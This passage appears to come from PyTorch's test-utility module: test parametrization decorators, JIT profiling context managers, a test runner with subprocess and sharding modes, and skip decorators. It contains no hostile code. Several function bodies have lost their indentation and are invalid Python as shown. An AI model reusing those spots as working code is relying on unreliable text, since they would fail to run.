            instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
    """
    Explicit subtest case for use with test parametrization.

    Wrapping an entry of `arg_values` in a `subtest` lets callers give the
    generated test an explicit name and/or attach decorators to it.

    Args:
        arg_values (iterable): Iterable of arg values (e.g. range(10)) or
            tuples of arg values (e.g. [(1, 2), (3, 4)]).
        name (str): Optional name to use for the test.
        decorators (iterable): Iterable of decorators to apply to the generated test.
    """
    # No per-instance __dict__; these are created in bulk during parametrization.
    __slots__ = ['arg_values', 'name', 'decorators']

    def __init__(self, arg_values, name=None, decorators=None):
        self.arg_values = arg_values
        self.name = name
        # A falsy `decorators` (None, empty list, ...) normalizes to [].
        self.decorators = decorators or []
class parametrize(_TestParametrizer):
    """
    Decorator for applying generic test parametrizations.

    The interface for this decorator is modeled after `@pytest.mark.parametrize`.
    Basic usage between this decorator and pytest's is identical. The first argument
    should be a string containing comma-separated names of parameters for the test, and
    the second argument should be an iterable returning values or tuples of values for
    the case of multiple parameters.

    Beyond this basic usage, the decorator provides some additional functionality that
    pytest does not.

    1. Parametrized tests end up as generated test functions on unittest test classes.
    Since this differs from how pytest works, this decorator takes on the additional
    responsibility of naming these test functions. The default test names consists of
    the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
    but custom names can be defined using `name_fn` or the `subtest` structure (see below).

    2. The decorator specially handles parameter values of type `subtest`, which allows for
    more fine-grained control over both test naming and test execution. In particular, it can
    be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
    below).

    Examples::

        @parametrize("x", range(5))
        def test_foo(self, x):
            ...

        @parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
        def test_bar(self, x, y):
            ...

        @parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
                     name_fn=lambda x, y: '{}_{}'.format(x, y))
        def test_bar_custom_names(self, x, y):
            ...

        @parametrize("x, y", [subtest((1, 2), name='double'),
                              subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
                              subtest((1, 4), name='quadruple')])
        def test_baz(self, x, y):
            ...

    Args:
        arg_str (str): String of arg names separate by commas (e.g. "x,y").
        arg_values (iterable): Iterable of arg values (e.g. range(10)) or
            tuples of arg values (e.g. [(1, 2), (3, 4)]).
        name_fn (callable): Optional function that takes in parameters and returns subtest name.
    """
    def __init__(self, arg_str, arg_values, name_fn=None):
        super().__init__(handles_dtypes=False)
        # Fix: strip whitespace so "x, y" (as used in the docstring examples)
        # yields usable kwarg names instead of ' y', and drop empty names so
        # that arg_str='' produces [] (making the no-params branch reachable).
        self.arg_names = [s.strip() for s in arg_str.split(',') if s.strip() != '']
        self.arg_values = arg_values
        self.name_fn = name_fn

    def _formatted_str_repr(self, name, value):
        """ Returns a string representation for the given arg that is suitable for use in test function names. """
        if isinstance(value, torch.dtype):
            return dtype_name(value)
        elif isinstance(value, torch.device):
            return str(value)
        # Can't use isinstance as it would cause a circular import
        elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
            return value.formatted_name
        else:
            # Include name and value separated by underscore.
            return '{}_{}'.format(name, str(value).replace('.', '_'))

    def _default_subtest_name(self, values):
        """Default name: '<arg>_<value>' pairs joined by underscores."""
        return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])

    def _get_subtest_name(self, values, explicit_name=None):
        """Resolve naming priority: explicit subtest name > name_fn > default."""
        if explicit_name:
            subtest_name = explicit_name
        elif self.name_fn:
            subtest_name = self.name_fn(*values)
        else:
            subtest_name = self._default_subtest_name(values)
        return subtest_name

    def _parametrize_test(self, test, generic_cls, device_cls):
        if len(self.arg_names) == 0:
            # No additional parameters needed for the test.
            test_name = device_cls.device_type if device_cls else ''
            yield (test, test_name, {})
        else:
            # Each "values" item is expected to be either:
            # * A tuple of values with one for each arg. For a single arg, a single item is expected.
            # * A subtest instance with arg_values matching the previous.
            for values in self.arg_values:
                maybe_name = None
                if isinstance(values, subtest):
                    sub = values
                    values = sub.arg_values
                    maybe_name = sub.name

                    # Apply decorators to a fresh wrapper so they don't
                    # accumulate on the shared generic test function.
                    @wraps(test)
                    def test_wrapper(*args, **kwargs):
                        return test(*args, **kwargs)

                    for decorator in sub.decorators:
                        test_wrapper = decorator(test_wrapper)

                    gen_test = test_wrapper
                else:
                    gen_test = test

                # For a single arg, each entry is the bare value, not a tuple.
                values = list(values) if len(self.arg_names) > 1 else [values]
                if len(values) != len(self.arg_names):
                    raise RuntimeError('Expected # values == # arg names, but got: {} '
                                       'values and {} names for test "{}"'.format(
                                           len(values), len(self.arg_names), test.__name__))

                param_kwargs = {
                    name: value for name, value in zip(self.arg_names, values)
                }

                subtest_name = self._get_subtest_name(values, explicit_name=maybe_name)
                test_name = '{}{}'.format(subtest_name, '_' + device_cls.device_type if device_cls else '')
                if '.' in test_name:
                    raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))

                yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
    # Which JIT graph executor the test suite runs under; selected via the
    # --jit_executor CLI flag or inferred from the C++ flags by
    # cppProfilingFlagsToProfilingMode().
    LEGACY = 1
    SIMPLE = 2
    PROFILING = 3
def cppProfilingFlagsToProfilingMode():
    """Infer the active ProfilingMode from the C++ JIT flags.

    The setters return the previous flag value, so we read the current state
    by setting each flag to True and immediately restoring what was there.
    """
    prev_exec = torch._C._jit_set_profiling_executor(True)
    prev_mode = torch._C._jit_set_profiling_mode(True)
    torch._C._jit_set_profiling_executor(prev_exec)
    torch._C._jit_set_profiling_mode(prev_mode)

    if not prev_exec:
        return ProfilingMode.LEGACY
    return ProfilingMode.PROFILING if prev_mode else ProfilingMode.SIMPLE
@contextmanager
def enable_profiling_mode_for_profiling_tests():
    """Enable the JIT profiling flags for the duration of the block, but only
    when the suite runs under the profiling graph executor; restore the
    previous flag values on exit."""
    if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
        saved_exec = torch._C._jit_set_profiling_executor(True)
        saved_mode = torch._C._jit_set_profiling_mode(True)
    try:
        yield
    finally:
        # Re-check the executor mode so restoration mirrors the setup branch.
        if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
            torch._C._jit_set_profiling_executor(saved_exec)
            torch._C._jit_set_profiling_mode(saved_mode)
@contextmanager
def enable_profiling_mode():
    """Unconditionally enable the JIT profiling executor and profiling mode
    inside the block, restoring the previous flag values afterwards."""
    saved_exec = torch._C._jit_set_profiling_executor(True)
    saved_mode = torch._C._jit_set_profiling_mode(True)
    try:
        yield
    finally:
        torch._C._jit_set_profiling_executor(saved_exec)
        torch._C._jit_set_profiling_mode(saved_mode)
@contextmanager
def num_profiled_runs(num_runs):
    """Temporarily set the number of profiled runs used by the JIT executor,
    restoring the previous count on exit."""
    previous = torch._C._jit_set_num_profiled_runs(num_runs)
    try:
        yield
    finally:
        torch._C._jit_set_num_profiled_runs(previous)
# Save the unpatched call implementations so the wrappers below can delegate.
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__

def prof_callable(callable, *args, **kwargs):
    # 'profile_and_replay' is a test-only kwarg, consumed here and never
    # forwarded. Under the profiling executor the callable is invoked twice:
    # once to record profiling information, then again for the actual result
    # (presumably so the second run exercises the profiled graph -- TODO confirm).
    if 'profile_and_replay' in kwargs:
        del kwargs['profile_and_replay']
        if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
            with enable_profiling_mode_for_profiling_tests():
                callable(*args, **kwargs)
                return callable(*args, **kwargs)

    return callable(*args, **kwargs)

def prof_func_call(*args, **kwargs):
    # Replacement for ScriptFunction.__call__ (installed below).
    return prof_callable(func_call, *args, **kwargs)

def prof_meth_call(*args, **kwargs):
    # Replacement for ScriptMethod.__call__ (installed below).
    return prof_callable(meth_call, *args, **kwargs)

# Monkey-patch TorchScript call entry points so tests can pass
# profile_and_replay=True transparently.
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call  # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call  # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
# CLI flags understood by the PyTorch test harness; anything unrecognized is
# forwarded to unittest via parse_known_args() below.
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
                    help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
# XML reports are enabled by default only in CI; passing --save-xml with no
# value uses the computed default report path.
parser.add_argument('--save-xml', nargs='?', type=str,
                    const=_get_test_report_path(),
                    default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)

# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
    unittest.main(argv=argv)

if '-h' in sys.argv or '--help' in sys.argv:
    # unittest.main() would exit the process after printing its help, so it is
    # run on a separate thread; the parser's help still prints afterwards.
    help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
    help_thread.start()
    help_thread.join()
args, remaining = parser.parse_known_args()
# Choose the JIT graph executor mode: explicit via --jit_executor, otherwise
# inferred from the current C++ profiling flags.
if args.jit_executor == 'legacy':
    GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
    GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
    GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
    # infer flags based on the default settings
    GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()

# Module-level mirrors of the parsed CLI flags, consumed by run_tests() and
# by decorators throughout this module.
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
    expecttest.ACCEPT = args.accept
# Unrecognized args are handed through to unittest.
UNITTEST_ARGS = [sys.argv[0]] + remaining
# Seed torch's global RNG at import time with --seed (default 1234).
torch.manual_seed(SEED)

# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
    """Wait for subprocess `p` to exit and return its exit status.

    On KeyboardInterrupt the child gets a short grace period to exit on its
    own (so e.g. pytest can print what it collected so far); otherwise it is
    killed and the interrupt re-raised. Any other error also kills the child.
    """
    try:
        return p.wait()
    except KeyboardInterrupt:
        # Give `p` a chance to handle the interrupt itself.
        exit_status = p.wait(timeout=5)
        if exit_status is not None:
            return exit_status
        p.kill()
        raise
    except:  # noqa: B001,E722, copied from python core library
        p.kill()
        raise
    finally:
        # Always call p.wait() to ensure exit
        p.wait()
def shell(command, cwd=None, env=None):
    """Run `command` (a list/tuple of tokens, never a string) as a subprocess
    and return its exit status via wait_for_process()."""
    sys.stdout.flush()
    sys.stderr.flush()
    # The following cool snippet is copied from Py3 core library subprocess.call
    # only the with
    #   1. `except KeyboardInterrupt` block added for SIGINT handling.
    #   2. In Py2, subprocess.Popen doesn't return a context manager, so we do
    #      `p.wait()` in a `final` block for the code to be portable.
    #
    # https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
    #
    # Fix: check str/bytes directly instead of torch._six.string_classes --
    # the torch._six compatibility shim has been removed from modern PyTorch.
    assert not isinstance(command, (str, bytes)), "Command to shell should be a list or tuple of tokens"
    p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
    return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
    """Decorator factory: run the wrapped test once per dtype in `dtypes`,
    each run inside its own subTest context."""
    def decorator(test_fn):
        @wraps(test_fn)
        def runner(self, *args):
            for dtype in dtypes:
                with TestCase.subTest(self, dtype=dtype):
                    test_fn(self, *args, dtype=dtype)
        return runner
    return decorator
def discover_test_cases_recursively(suite_or_case):
    """Flatten a unittest suite/case tree into a flat list of TestCase objects."""
    if isinstance(suite_or_case, unittest.TestCase):
        return [suite_or_case]
    return [case
            for child in suite_or_case
            for case in discover_test_cases_recursively(child)]
def get_test_names(test_cases):
    """Return 'TestClass.test_method' identifiers (last two id components)
    for the given test cases."""
    def short_name(case):
        parts = case.id().split('.')
        return '.'.join(parts[-2:])
    return [short_name(case) for case in test_cases]
def _print_test_names():
    """Print the name of every test discovered in the __main__ module."""
    all_cases = discover_test_cases_recursively(
        unittest.TestLoader().loadTestsFromModule(__main__))
    for name in get_test_names(all_cases):
        print(name)
def chunk_list(lst, nchunks):
    """Split `lst` round-robin into `nchunks` interleaved sublists
    (element i goes to chunk i % nchunks)."""
    chunks = [[] for _ in range(nchunks)]
    for i, item in enumerate(lst):
        chunks[i % nchunks].append(item)
    return chunks
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
    """Convert a test file path to its dotted module form (see example above)."""
    # inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
    if filename.startswith(CI_TEST_PREFIX):
        filename = filename[len(CI_TEST_PREFIX) + 1:]
    # Fix: escape the dot so only a literal ".py" suffix is stripped --
    # r'.py$' would also strip e.g. a bare "apy"/"_py" 3-char tail.
    strip_py = re.sub(r'\.py$', '', filename)
    return strip_py.replace('/', '.')
def run_tests(argv=UNITTEST_ARGS):
    """Main entry point for a PyTorch test file.

    Loads the CI slow/disabled test lists when requested, then dispatches to
    the launch mode selected by the module-level CLI flags: name discovery,
    one-subprocess-per-test, parallel shards, XML reporting, repeated runs,
    or plain unittest.main().
    """
    # import test files.
    if IMPORT_SLOW_TESTS:
        if os.path.exists(IMPORT_SLOW_TESTS):
            global slow_tests_dict
            with open(IMPORT_SLOW_TESTS, 'r') as fp:
                slow_tests_dict = json.load(fp)
        else:
            print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
    if IMPORT_DISABLED_TESTS:
        if os.path.exists(IMPORT_DISABLED_TESTS):
            global disabled_tests_dict
            with open(IMPORT_DISABLED_TESTS, 'r') as fp:
                disabled_tests_dict = json.load(fp)
        else:
            print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
    # Determine the test launch mechanism
    if TEST_DISCOVER:
        # Only list the tests that would run; don't execute anything.
        _print_test_names()
    elif TEST_IN_SUBPROCESS:
        # Run each discovered test case in its own Python subprocess,
        # collecting the names of the ones that fail.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        failed_tests = []
        for case in test_cases:
            test_case_full_name = case.id().split('.', 1)[1]
            exitcode = shell([sys.executable] + argv + [test_case_full_name])
            if exitcode != 0:
                failed_tests.append(test_case_full_name)

        assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
            len(failed_tests), '\n\t'.join(failed_tests))
    elif RUN_PARALLEL > 1:
        # Shard the test names round-robin across RUN_PARALLEL child
        # processes; each shard logs with a distinct --log-suffix.
        suite = unittest.TestLoader().loadTestsFromModule(__main__)
        test_cases = discover_test_cases_recursively(suite)
        test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
        processes = []
        for i in range(RUN_PARALLEL):
            command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
            processes.append(subprocess.Popen(command, universal_newlines=True))
        failed = False
        for p in processes:
            failed |= wait_for_process(p) != 0
        assert not failed, "Some test shards have failed"
    elif TEST_SAVE_XML is not None:
        # import here so that non-CI doesn't need xmlrunner installed
        import xmlrunner  # type: ignore[import]
        # sys._getframe(1): derive the report subdirectory from the *caller's*
        # test file, not this module.
        test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
        test_report_path = TEST_SAVE_XML + LOG_SUFFIX
        test_report_path = os.path.join(test_report_path, test_filename)
        os.makedirs(test_report_path, exist_ok=True)
        verbose = '--verbose' in argv or '-v' in argv
        if verbose:
            print('Test results will be stored in {}'.format(test_report_path))
        unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
    elif REPEAT_COUNT > 1:
        # Run the whole suite REPEAT_COUNT times, exiting on the first failure.
        for _ in range(REPEAT_COUNT):
            if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
                sys.exit(-1)
    else:
        unittest.main(argv=argv)
# Host-platform flags, evaluated once at import.
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
    """Detect AVX512-VNNI CPU support via /proc/cpuinfo.

    Returns False on any non-Linux platform, where /proc/cpuinfo is unavailable.
    """
    if sys.platform != 'linux':
        return False
    with open("/proc/cpuinfo", encoding="ascii") as cpuinfo:
        return "avx512vnni" in cpuinfo.read()

IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
# Context manager yielding the *name* of a temporary file that callers may
# re-open; platform-specific because Windows can't open the same file twice.
if IS_WINDOWS:
    @contextmanager
    def TemporaryFileName(*args, **kwargs):
        # Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
        # opens the file, and it cannot be opened multiple times in Windows. To support Windows,
        # close the file after creation and try to remove it manually
        if 'delete' in kwargs:
            if kwargs['delete'] is not False:
                # NOTE(review): raising UserWarning (a Warning subclass) as an
                # exception is unusual but rejects delete=True loudly here.
                raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
        else:
            kwargs['delete'] = False
        f = tempfile.NamedTemporaryFile(*args, **kwargs)
        try:
            f.close()
            yield f.name
        finally:
            os.unlink(f.name)
else:
    @contextmanager  # noqa: T484
    def TemporaryFileName(*args, **kwargs):
        # On POSIX the file can stay open while callers re-open it by name;
        # NamedTemporaryFile then cleans up on exit.
        with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
            yield f.name
# Context manager yielding the name of a temporary directory; platform-specific
# for the same premature-removal reasons as TemporaryFileName above.
if IS_WINDOWS:
    @contextmanager
    def TemporaryDirectoryName(suffix=None):
        # On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
        # so we first create the directory using mkdtemp and then remove it manually
        try:
            dir_name = tempfile.mkdtemp(suffix=suffix)
            yield dir_name
        finally:
            shutil.rmtree(dir_name)
else:
    @contextmanager  # noqa: T484
    def TemporaryDirectoryName(suffix=None):
        with tempfile.TemporaryDirectory(suffix=suffix) as d:
            yield d
# Whether the filesystem encoding in effect is UTF-8.
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
# Optional-dependency availability flags, probed without importing.
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')

BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")

# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
# Sanitizer / backend variants of the test run, driven by CI env vars.
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'

# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests.  (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'

# Disables noarch tests; all but one CI configuration disables these.  We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'

# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'

# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'

# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")

# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
    np.bool_      : torch.bool,
    np.uint8      : torch.uint8,
    np.int8       : torch.int8,
    np.int16      : torch.int16,
    np.int32      : torch.int32,
    np.int64      : torch.int64,
    np.float16    : torch.float16,
    np.float32    : torch.float32,
    np.float64    : torch.float64,
    np.complex64  : torch.complex64,
    np.complex128 : torch.complex128
}

if IS_WINDOWS:
    # Size of `np.intc` is platform defined.
    # It is returned by functions like `bitwise_not`.
    # On Windows `int` is 32-bit
    # https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
    numpy_to_torch_dtype_dict[np.intc] = torch.int

# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}

ALL_TENSORTYPES = [torch.float,
                   torch.double,
                   torch.half]

# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
    ALL_TENSORTYPES2 = [torch.float,
                        torch.double,
                        torch.half,
                        torch.bfloat16]
else:
    ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
    """Skip the wrapped test when running on the ROCm stack."""
    @wraps(fn)
    def rocm_guard(*args, **kwargs):
        if TEST_WITH_ROCM:
            raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
        fn(*args, **kwargs)
    return rocm_guard
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
    """Decorator factory: skip unless running ROCm >= `version` (a tuple/list)."""
    def dec_fn(fn):
        @wraps(fn)
        def wrap_fn(self, *args, **kwargs):
            if not TEST_WITH_ROCM:
                raise unittest.SkipTest("ROCm not available")
            # torch.version.hip looks like "X.Y.Z-<git sha>"; keep only X.Y.Z.
            installed = str(torch.version.hip).split("-")[0]
            installed_tuple = tuple(int(part) for part in installed.split("."))
            if installed_tuple is None or version is None or installed_tuple < tuple(version):
                reason = "ROCm {0} is available but {1} required".format(installed_tuple, version)
                raise unittest.SkipTest(reason)
            return fn(self, *args, **kwargs)
        return wrap_fn
    return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
    """Skip unless the PYTORCH_MIOPEN_SUGGEST_NHWC env toggle is enabled."""
    @wraps(fn)
    def nhwc_guard(*args, **kwargs):
        if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
            raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
        fn(*args, **kwargs)
    return nhwc_guard
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
    """Sets torch's deterministic-algorithms flag (and warn_only mode) on
    entry, and restores the previous settings on exit."""

    def __init__(self, deterministic, *, warn_only=False):
        self.deterministic = deterministic
        self.warn_only = warn_only

    def __enter__(self):
        # Snapshot the current flags before overriding them.
        self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
        self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
        torch.use_deterministic_algorithms(self.deterministic, warn_only=self.warn_only)

    def __exit__(self, exception_type, exception_value, traceback):
        torch.use_deterministic_algorithms(self.deterministic_restore,
                                           warn_only=self.warn_only_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
    """Sets the CUDA sync debug mode on entry and restores the previous
    mode on exit."""

    def __init__(self, sync_debug_mode):
        self.mode = sync_debug_mode

    def __enter__(self):
        self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
        torch.cuda.set_sync_debug_mode(self.mode)

    def __exit__(self, exception_type, exception_value, traceback):
        torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
    """Decorator for tests that call torch.use_deterministic_algorithms():
    restores the previous deterministic flag setting -- and, on CUDA >= 10.2,
    the CUBLAS_WORKSPACE_CONFIG environment variable -- after the test.
    See the comment block above for details and a subprocess recipe."""
    @wraps(fn)
    def wrapper(*args, **kwargs):
        with DeterministicGuard(
                torch.are_deterministic_algorithms_enabled(),
                warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
            class CuBLASConfigGuard:
                cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'

                def __enter__(self):
                    # Setting the workspace config avoids the error CUDA >= 10.2
                    # raises for deterministic cuBLAS without it.
                    self.is_cuda10_2_or_higher = (
                        (torch.version.cuda is not None)
                        and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
                    if self.is_cuda10_2_or_higher:
                        self.cublas_config_restore = os.environ.get(self.cublas_var_name)
                        os.environ[self.cublas_var_name] = ':4096:8'

                def __exit__(self, exception_type, exception_value, traceback):
                    # Restore the environment exactly as it was found:
                    # delete the var if it didn't exist, else put back the old value.
                    if self.is_cuda10_2_or_higher:
                        cur_cublas_config = os.environ.get(self.cublas_var_name)
                        if self.cublas_config_restore is None:
                            if cur_cublas_config is not None:
                                del os.environ[self.cublas_var_name]
                        else:
                            os.environ[self.cublas_var_name] = self.cublas_config_restore
            with CuBLASConfigGuard():
                fn(*args, **kwargs)
    return wrapper
def skipIfCompiledWithoutNumpy(fn):
    """Skip the test when PyTorch was built without numpy support."""
    # Even when the numpy module is importable, torch may have been built
    # with USE_NUMPY=0; probe once at decoration time.
    numpy_support = TEST_NUMPY
    if numpy_support:
        try:
            torch.from_numpy(np.array([2, 2]))
        except RuntimeError:
            numpy_support = False

    @wraps(fn)
    def numpy_guard(*args, **kwargs):
        if not numpy_support:
            raise unittest.SkipTest("PyTorch was compiled without numpy support")
        fn(*args, **kwargs)
    return numpy_guard
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
    """Skip the test when PyTorch was built without LAPACK support."""
    @wraps(fn)
    def lapack_guard(*args, **kwargs):
        if not torch._C.has_lapack:
            raise unittest.SkipTest('PyTorch compiled without Lapack')
        fn(*args, **kwargs)
    return lapack_guard
def skipIfNotRegistered(op_name, message):
    """Wraps the decorator to hide the import of the `core`.

    Args:
        op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
        message: message to fail with.

    Usage:
        @skipIfNotRegistered('MyOp', 'MyOp is not linked!')
    This will check if 'MyOp' is in the caffe2.python.core
    """
    if not BUILD_WITH_CAFFE2:
        return unittest.skip("Pytorch is compiled without Caffe2")
    try:
        from caffe2.python import core
    except ImportError:
        return unittest.skip("Cannot import `caffe2.python.core`")
    return unittest.skipIf(op_name not in core._REGISTERED_OPERATORS, message)
def skipIfNoSciPy(fn):
